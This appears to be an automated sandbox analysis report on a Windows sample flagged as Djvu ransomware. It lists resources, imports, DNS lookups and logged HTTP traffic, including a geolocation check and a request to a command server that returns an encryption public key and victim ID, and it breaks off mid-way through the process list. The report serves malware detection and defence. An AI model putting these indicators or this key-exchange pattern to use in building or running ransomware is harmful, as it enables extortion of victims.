RT_ICON | 0xbb918 | 0x8a8 | data | English | United States
RT_ICON | 0xbc1c0 | 0x6c8 | data | English | United States
RT_ICON | 0xbc888 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xbcdf0 | 0x25a8 | data | English | United States
RT_ICON | 0xbf398 | 0x10a8 | data | English | United States
RT_ICON | 0xc0440 | 0x988 | data | English | United States
RT_ICON | 0xc0dc8 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc12a8 | 0xea8 | data | English | United States
RT_ICON | 0xc2150 | 0x8a8 | data | English | United States
RT_ICON | 0xc29f8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc2f60 | 0x25a8 | data | English | United States
RT_ICON | 0xc5508 | 0x10a8 | data | English | United States
RT_ICON | 0xc65b0 | 0x988 | data | English | United States
RT_ICON | 0xc6f38 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc7408 | 0xea8 | data | English | United States
RT_ICON | 0xc82b0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 11579566, next used block 14210779 | English | United States
RT_ICON | 0xc8b58 | 0x6c8 | data | English | United States
RT_ICON | 0xc9220 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc9788 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xcbd30 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 669034958, next used block 719231181 | English | United States
RT_ICON | 0xccdd8 | 0x988 | data | English | United States
RT_ICON | 0xcd760 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xcdc40 | 0xea8 | data | English | United States
RT_ICON | 0xceae8 | 0x8a8 | data | English | United States
RT_ICON | 0xcf390 | 0x6c8 | data | English | United States
RT_ICON | 0xcfa58 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xcffc0 | 0x25a8 | data | English | United States
RT_ICON | 0xd2568 | 0x10a8 | data | English | United States
RT_ICON | 0xd3610 | 0x988 | data | English | United States
RT_ICON | 0xd3f98 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_STRING | 0xd6c18 | 0x2e2 | data | French | Luxembourg
RT_STRING | 0xd6f00 | 0x41e | data | French | Luxembourg
RT_ACCELERATOR | 0xd5138 | 0x48 | data | French | Luxembourg
RT_ACCELERATOR | 0xd5180 | 0x18 | data | French | Luxembourg
RT_GROUP_CURSOR | 0xd52d8 | 0x14 | data | |
RT_GROUP_CURSOR | 0xd6a40 | 0x22 | data | |
RT_GROUP_ICON | 0xc1230 | 0x76 | data | English | United States
RT_GROUP_ICON | 0xcdbc8 | 0x76 | data | English | United States
RT_GROUP_ICON | 0xd4400 | 0x76 | data | English | United States
RT_GROUP_ICON | 0xc73a0 | 0x68 | data | English | United States
RT_VERSION | 0xd6a68 | 0x1b0 | data | |
None | 0xd5198 | 0xa | data | |

Imports

DLL | Import
KERNEL32.dll | HeapReAlloc, GlobalDeleteAtom, GetLocaleInfoA, InterlockedIncrement, GetQueuedCompletionStatus, GetEnvironmentStringsW, SetEvent, ReadConsoleW, GetCommandLineA, CreateActCtxW, GlobalAlloc, CopyFileW, FreeConsole, LeaveCriticalSection, GetFileAttributesA, HeapCreate, WriteConsoleW, GetModuleFileNameW, lstrlenW, ReleaseSemaphore, SetConsoleTitleA, FlushFileBuffers, DeactivateActCtx, InterlockedExchange, GetProcAddress, BeginUpdateResourceW, RemoveDirectoryA, VerLanguageNameW, LocalAlloc, SetConsoleWindowInfo, SetEnvironmentVariableA, SetConsoleTitleW, GetModuleHandleA, EraseTape, VirtualProtect, EndUpdateResourceA, FindFirstVolumeW, GetCurrentProcessId, GetPrivateProfileSectionW, FindNextVolumeA, lstrcpyW, GetConsoleOutputCP, WideCharToMultiByte, InterlockedDecrement, InterlockedCompareExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, GetLastError, HeapFree, HeapAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, GetCPInfo, RtlUnwind, RaiseException, LCMapStringW, LCMapStringA, GetStringTypeW, VirtualFree, VirtualAlloc, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetStringTypeA, HeapSize, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, LoadLibraryA, CloseHandle, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA

Exports

Name | Ordinal | Address
@SetFirstVice@8 | 1 | 0x401787

Version Infos

Description | Data
InternalName | sajbmianozu.iya
ProductVersion | 2.4.59.42
Copyright | Copyrighz (C) 2021, fudkagat
Translation | 0x0127 0x007a

Possible Origin

Language of compilation system | Country where language is spoken
French | Luxembourg
English | United States

Network Behavior

Network Port Distribution

TCP Packets

                                                                                    Oct 4, 2021 12:30:17.004153013 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:17.005218029 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:17.006035089 CEST49753443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:17.006072044 CEST4434975377.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.350580931 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.350665092 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.350857019 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.377549887 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.377612114 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.490098000 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.490227938 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.501593113 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.501635075 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.502064943 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.502609968 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.506625891 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.551153898 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601296902 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601389885 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:25.601627111 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.602968931 CEST49756443192.168.2.377.123.139.190
                                                                                    Oct 4, 2021 12:30:25.603014946 CEST4434975677.123.139.190192.168.2.3
                                                                                    Oct 4, 2021 12:30:26.202029943 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.463438988 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:26.465034962 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.466541052 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:26.937055111 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.236531019 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.236567974 CEST8049757123.213.233.194192.168.2.3
                                                                                    Oct 4, 2021 12:30:27.247159958 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:27.247198105 CEST4975780192.168.2.3123.213.233.194
                                                                                    Oct 4, 2021 12:30:27.508488894 CEST8049757123.213.233.194192.168.2.3

UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 4, 2021 12:29:56.234675884 CEST | 192.168.2.3 | 8.8.8.8 | 0x4749 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:09.353683949 CEST | 192.168.2.3 | 8.8.8.8 | 0x5366 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:15.825882912 CEST | 192.168.2.3 | 8.8.8.8 | 0x7199 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:16.677743912 CEST | 192.168.2.3 | 8.8.8.8 | 0xd753 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:25.317594051 CEST | 192.168.2.3 | 8.8.8.8 | 0x9b6a | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:25.832859039 CEST | 192.168.2.3 | 8.8.8.8 | 0xf036 | Standard query (0) | securebiz.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 4, 2021 12:29:56.254905939 CEST | 8.8.8.8 | 192.168.2.3 | 0x4749 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:09.373421907 CEST | 8.8.8.8 | 192.168.2.3 | 0x5366 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:15.845464945 CEST | 8.8.8.8 | 192.168.2.3 | 0x7199 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:16.722148895 CEST | 8.8.8.8 | 192.168.2.3 | 0xd753 | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:25.334136009 CEST | 8.8.8.8 | 192.168.2.3 | 0x9b6a | No error (0) | api.2ip.ua | | 77.123.139.190 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 123.213.233.194 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 210.207.244.101 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 175.117.131.126 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 210.92.250.133 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 180.69.193.102 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 189.232.18.171 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 190.147.156.126 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 58.124.228.242 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 211.168.197.211 | A (IP address) | IN (0x0001)
Oct 4, 2021 12:30:26.199101925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf036 | No error (0) | securebiz.org | | 138.36.3.134 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• api.2ip.ua
• securebiz.org

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49750 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe
1 | 192.168.2.3 | 49751 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe
2 | 192.168.2.3 | 49752 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe
3 | 192.168.2.3 | 49753 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe
4 | 192.168.2.3 | 49756 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe

Sessions 0 to 4 (port 443) show no plaintext data in this table.

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49757 | 123.213.233.194 | 80 | C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe

Timestamp | kBytes transferred | Direction | Data
Oct 4, 2021 12:30:26.466541052 CEST | 1093 | OUT | GET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: securebiz.org
Oct 4, 2021 12:30:27.236531019 CEST | 1094 | IN | HTTP/1.1 200 OK
    Date: Mon, 04 Oct 2021 10:29:27 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Content-Length: 558
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49750 | 77.123.139.190 | 443 | C:\Users\user\Desktop\NZPC0PFaC0.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-04 10:29:57 UTC | 0 | OUT | GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
2021-10-04 10:29:57 UTC | 0 | IN | HTTP/1.1 200 OK
    Date: Mon, 04 Oct 2021 10:29:57 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Cache-Control: max-age=15552000
    Expires: Sat, 02 Apr 2022 10:29:57 GMT
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: application/json
2021-10-04 10:29:57 UTC | 0 | IN | Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session ID:1
                                                                                    Source IP:192.168.2.3
                                                                                    Source Port:49751
                                                                                    Destination IP:77.123.139.190
                                                                                    Destination Port:443
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    2021-10-04 10:30:09 UTC | 1 | OUT | GET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:09 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:09 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:09 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:09 UTC | 1 | IN | Data Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session ID:2
                                                                                    Source IP:192.168.2.3
                                                                                    Source Port:49752
                                                                                    Destination IP:77.123.139.190
                                                                                    Destination Port:443
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    2021-10-04 10:30:16 UTC | 2 | OUT | GET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:16 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:16 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:16 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:16 UTC | 2 | IN | Data Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session ID:3
                                                                                    Source IP:192.168.2.3
                                                                                    Source Port:49753
                                                                                    Destination IP:77.123.139.190
                                                                                    Destination Port:443
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    2021-10-04 10:30:16 UTC | 3 | OUT | GET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:17 UTC | 3 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:16 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:16 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:17 UTC | 3 | IN | Data Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session ID:4
                                                                                    Source IP:192.168.2.3
                                                                                    Source Port:49756
                                                                                    Destination IP:77.123.139.190
                                                                                    Destination Port:443
                                                                                    Process:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    2021-10-04 10:30:25 UTC | 4 | OUT | GET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:25 UTC | 4 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:25 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:25 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:25 UTC | 4 | IN | Data Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Memory Usage

                                                                                    High Level Behavior Distribution

                                                                                    Behavior

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:12:29:46
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:29:53
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:29:57
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                    Wow64 process (32bit):true
